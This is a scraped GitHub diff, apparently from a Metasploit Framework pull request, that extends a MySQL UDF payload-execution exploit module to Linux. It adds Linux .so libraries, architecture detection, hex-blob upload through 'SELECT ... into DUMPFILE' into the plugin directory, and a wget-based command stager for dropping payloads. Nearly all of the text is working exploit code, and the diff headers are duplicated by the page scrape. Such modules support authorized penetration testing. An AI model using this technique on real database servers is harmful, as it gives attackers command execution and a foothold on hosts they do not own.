sempervictus
diff --git a/‎data/exploits/mysql/lib_mysqludf_sys_32.so
5.56 KB b/‎data/exploits/mysql/lib_mysqludf_sys_32.so
5.56 KB
diff --git a/‎data/exploits/mysql/lib_mysqludf_sys_64.so
7.85 KB b/‎data/exploits/mysql/lib_mysqludf_sys_64.so
7.85 KB
diff --git a/‎documentation/modules/exploit/multi/local/mysql_udf_priv_esc.md
Lines changed: 1 addition & 0 deletions b/‎documentation/modules/exploit/multi/local/mysql_udf_priv_esc.md
Lines changed: 1 addition & 0 deletions
diff --git a/‎lib/msf/core/exploit/mysql.rb
Lines changed: 24 additions & 4 deletions b/‎lib/msf/core/exploit/mysql.rb
Lines changed: 24 additions & 4 deletions
diff --git a/‎modules/exploits/windows/mysql/mysql_payload.rb renamed to ‎modules/exploits/multi/mysql/mysql_udf_payload.rb
Lines changed: 7 additions & 6 deletions b/‎modules/exploits/windows/mysql/mysql_payload.rb renamed to ‎modules/exploits/multi/mysql/mysql_udf_payload.rb
Lines changed: 7 additions & 6 deletions
@@ -0,0 +1 @@
+on ubuntu, edit /lib/systemd/system/mysql.service
@@ -144,21 +144,32 @@ def mysql_upload_binary(bindata)
     binname = Rex::Text.rand_text_alpha(8)
     binpath = tmpdir << binname
     print_status "Uploading binary as #{binpath}..."
+    print_status "SELECT #{blob} into DUMPFILE '#{binpath}'"
     res = mysql_query("SELECT #{blob} into DUMPFILE '#{binpath}'")
     return res
   end
 
   def mysql_upload_sys_udf(arch=:win32,target_path=nil)
-    fname = (arch == :win32 ? "lib_mysqludf_sys_32.dll" : "lib_mysqludf_sys_64.dll")
+    case arch
+    when :win32
+      fname = 'lib_mysqludf_sys_32.dll'
+    when :win64
+      fname = 'lib_mysqludf_sys_64.dll'
+    when :linux32
+      fname = 'lib_mysqludf_sys_32.so'
+    when :linux64
+      fname = 'lib_mysqludf_sys_64.so'
+    end
     sys_dll = File.join( Msf::Config.data_directory, "exploits", "mysql", fname )
     data = File.open(sys_dll, "rb") {|f| f.read f.stat.size}
     blob = "0x"
     blob << data.unpack("C*").map {|x| "%02x" % [x]}.join
     dll_name = Rex::Text.rand_text_alpha(8)
-    target_dll = target_path << dll_name << ".dll"
+    [:win32, :win64].include?(arch) ? extension = '.dll' : extension = '.so'
+    target_dll = target_path << dll_name << extension
     print_status "Uploading #{fname} library to #{target_dll}..."
     mysql_query("SELECT #{blob} into DUMPFILE '#{target_dll}'")
-    return dll_name << ".dll"
+    return dll_name << extension
   end
 
   def mysql_drop_and_create_sys_exec(soname)
@@ -181,6 +192,15 @@ def mysql_get_arch
       :win64
     when /Win32/i
       :win32
+    when /Linux/i
+      # we need a second query to determine bits
+      res = mysql_get_variable("@@version_compile_machine")
+      return :unknown unless res
+      if res =~ /x86_64/i
+        :linux64
+      else
+        :linux32
+      end
     else
       res
     end
@@ -189,7 +209,7 @@ def mysql_get_arch
   def mysql_add_sys_exec
     arch = mysql_get_arch
     case arch
-    when :win64,:win32
+    when :win64,:win32,:linux64,:linux32
       target_path = mysql_get_plugin_dir
       if target_path
         print_status "Target arch (#{arch}) and target path both okay."
 
@@ -13,7 +13,7 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name'           => 'Oracle MySQL for Microsoft Windows Payload Execution',
+        'Name'           => 'Oracle MySQL UDF Payload Execution',
         'Description'    => %q{
           This module creates and enables a custom UDF (user defined function) on the
           target host via the SELECT ... into DUMPFILE method of binary injection. On
@@ -27,20 +27,21 @@ def initialize(info = {})
         'Author'         =>
           [
             'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
-            'todb' # this Metasploit module
+            'todb', # this Metasploit module
+            'h00die' # linux addition
           ],
         'License'        => MSF_LICENSE,
         'References'     =>
           [
             # Bernardo's work with cmd exec via udf
             [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
           ],
-        'Platform'       => 'win',
+        'Platform'       => ['win', 'linux'],
         'Targets'        =>
           [
-            [ 'Automatic', { } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
+            [ 'Windows', {'CmdStagerFlavor' => 'vbs'} ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
+            [ 'Linux', {'CmdStagerFlavor' => 'wget' } ]
           ],
-        'CmdStagerFlavor' => 'vbs',
         'DefaultTarget'  => 0,
         'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
     ))
@@ -83,7 +84,7 @@ def exploit
 
     if not m
       return
-    elsif not [:win32,:win64].include?(@mysql_arch)
+    elsif not [:win32,:win64,:linux64,:linux32].include?(@mysql_arch)
       print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
       return
     else
Original file line number	Diff line number	Diff line change
`@@ -0,0 +1 @@`
	`1`	`+on ubuntu, edit /lib/systemd/system/mysql.service`